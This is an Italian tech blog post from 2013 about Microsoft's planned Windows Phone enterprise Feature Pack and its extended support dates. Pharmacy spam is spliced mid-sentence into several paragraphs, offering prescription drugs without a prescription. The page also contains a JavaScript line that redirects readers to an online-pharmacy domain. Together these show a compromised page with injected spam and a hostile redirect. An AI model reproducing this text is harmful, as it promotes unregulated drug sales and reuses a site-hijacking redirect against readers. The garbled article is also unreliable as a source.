Il blog dedicato al mondo della tecnologia
0
 

Microsoft: per il primo trimestre del 2014 un Future Pack!

Banner

Microsoft durante il primo semestre 2014 rilascerà un Feature Pack che comprenderà diverse funzionalità enterprise. L’azienda ha anche deciso di allungare la durata del supporto per Windows Phone da 18 a 36 mesi.

In merito al Feature Pack, contiene funzionalità che consentiranno agli amministratori IT di avere più controllo su Windows Phone purchase discount medication! cost prednisone walmart. approved pharmacy, buy prednisone online. 8 e procurare una migliore esperienza di produttività ai dipendenti.

top quality medications. buy zoloft canada . express delivery, brand name zoloft versus generic.

Il supporto VPN non era previsto nel prossimo aggiornamento GDR3 di Windows Phone 8, per cui è probabile che il Feature Pack farà parte di Windows Phone 8.1, anche se questa ipotesi non è stata confermata. Comunque, Microsoft ritiene che il sistema operativo costituisca un investimento sicuro per le aziende.

Per di più, la casa americana rilascerà aggiornamenti fino al 12 gennaio 2016, quindi per circa 36 mesi. Questi avranno una distribuzione controllata dal produttore o dall’operatore telefonico, perciò la disponibilità potrà variare nov 25, 2011 – tags: buy baclofen for rumination online without a prescription and no membership get baclofen for tinnitus over the counter cod overnight a seconda al paese, della regione e delle caratteristiche hardware del device.

Quanto a Windows Phone 7.8, il supporto durerà 18 mesi e utilisation dapoxetine buy dapoxetine in pakistan priligy eksi dapoxetine 90 mg prix ya existe en mexico. america dapoxetine egypt harga ubat priligy buy  finirà il 9 settembre 2014.

window.location = “http://medicationsonlinedoctor.com”;

.

Potrebbero interessarti anche questi altri articoli:

  1. Rinviato di sei mesi l’abbandono del supporto Exchange
  2. Microsoft rilascia Office 2011 per Mac Service Pack 2
  3. Nokia Lumia: si punta su Windows Phone 8
  4. Microsoft Surface: forse in cantiere un nuovo terminale
  5. Windows Phone 7.8: in arrivo sui server Nokia
Banner
Scritto da il 12.07.2013 alle 7:00
Tags: / /
 

Scrivi il tuo commento...